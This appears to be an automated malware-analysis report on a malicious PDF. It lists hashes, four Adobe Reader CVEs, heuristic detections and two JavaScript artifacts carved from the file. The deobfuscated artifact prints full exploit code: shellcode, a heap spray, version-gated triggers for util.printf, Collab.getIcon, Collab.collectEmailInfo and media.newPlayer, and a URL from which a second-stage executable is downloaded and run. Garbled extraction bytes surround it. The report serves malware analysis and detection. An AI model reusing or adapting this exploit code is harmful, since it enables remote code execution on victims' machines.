PDF malware analysis — malicious · 7e2d94babc2b8890

MALICIOUS

PDF

12.7 KB Created: 2010-03-17 21:09:01 First seen: 2012-07-12

MD5: 11177542f1fd01e57f908893ab9c48d6 SHA-1: eb8cb343bbfe5d0d55874336058efb24251cfa7e SHA-256: 7e2d94babc2b88900dfee94170acd4dc3ababad8b61540058c83fd4f0db4ae22

410 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that leverages multiple known vulnerabilities in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL http://ulbjqupw.cn/pila/exe.php?606717496665bcba. The ML classifier strongly indicates maliciousness.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 10

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ulbjqupw.cn/pila/exe.php?606717496665bcba Referenced by PDF JavaScript
- http://ubqp.npl/x.h?077965caReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0022_000.js`	pdf-javascript-stream	PDF /JS object 22 at offset 0x2C31	2797 bytes
SHA-256: `dc77160a683cf8746edead6373ee75c13d1d4fe901c7cf085a82f01f1d68a171`
Preview script First 1,000 lines of the extracted script var eP = [ "l" , "v" , "" , "e" , "a" ]; f = new String ( eP [ 3 ] + eP [ 1 ] + eP [ 4 ] + eP [ 0 ] + eP [ 2 ] ) ; var p = [ "" , "geNth" , "Word" , "getPa" ]; v = new String ( p [ 3 ] + p [ 1 ] + p [ 2 ] + p [ 0 ] ) ; var t = [ "eNu" , "rds" , "mWo" , "get" , "Pag" , "" ]; pE = new String ( t [ 3 ] + t [ 4 ] + t [ 0 ] + t [ 2 ] + t [ 1 ] + t [ 5 ] ) ; var mX = [ "n" , "u" , "e" , "a" , "s" , "c" , "" , "p" , "e" ]; n = new String ( mX [ 1 ] + mX [ 0 ] + mX [ 2 ] + mX [ 4 ] + mX [ 5 ] + mX [ 3 ] + mX [ 7 ] + mX [ 2 ] + mX [ 6 ] ) ; var pA = [ "cha" , "t" , "" , "rCo" , "deA" ]; wJ = new String ( pA [ 0 ] + pA [ 3 ] + pA [ 4 ] + pA [ 1 ] + pA [ 2 ] ) ; var vS = [ "" , "de" , "fromC" , "harCo" ]; wN = new String ( vS [ 2 ] + vS [ 3 ] + vS [ 1 ] + vS [ 0 ] ) ; var l = [ "p" , "p" , "" , "a" ]; x = new String ( l [ 3 ] + l [ 0 ] + l [ 0 ] + l [ 2 ] ) ; var z = this ; var tY = String("swo%".substr(3)) ; var gR = 2 ; var xI = String ; var mN = 0 ; var b = 207 ; var x = z [ x ] ; var tK = 3 ; var iR = z [ n ] ; var h = z [ pE ] ( tK ) ; var lE = "" ; for ( var uL = mN ; uL < h ; uL += 1 ) { zC=z [ v ] ( tK , uL ) ; var wR = zC . substr ( zC . length - gR , gR ) ; var lU = iR ( tY + wR ) ; var iRC = lU [ wJ ] ( mN ) ; var cP = iRC ^ b ; lE += xI [ wN ] ( cP ) ; } this [ f ] ( lE ) ;
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3521 bytes
SHA-256: `4180d567a202db258d462b7c7cda8a33fe1849c3eddfd8fc557c417424c1e84a`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script /* getPageWords download URL: http://ulbjqupw.cn/pila/exe.php?606717496665bcba / var _u="http://ulbjqupw.cn/pila/exe.php?606717496665bcba"; b ""t"0 !b b a ab b bb!a!ab a "a "" " " a aaaaa var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%"; var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U"; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.author; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); try { media.newPlayer(null); } catch(e) {} util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); } } U2UcYKr(); dddd b ba "0aa0 "a" a " a0 ! " "ca a"0a0 c0""ca a" 0"!"!0"! 00!!" !b d db d��

Open this report in the interactive analyzer, or submit your own file for analysis.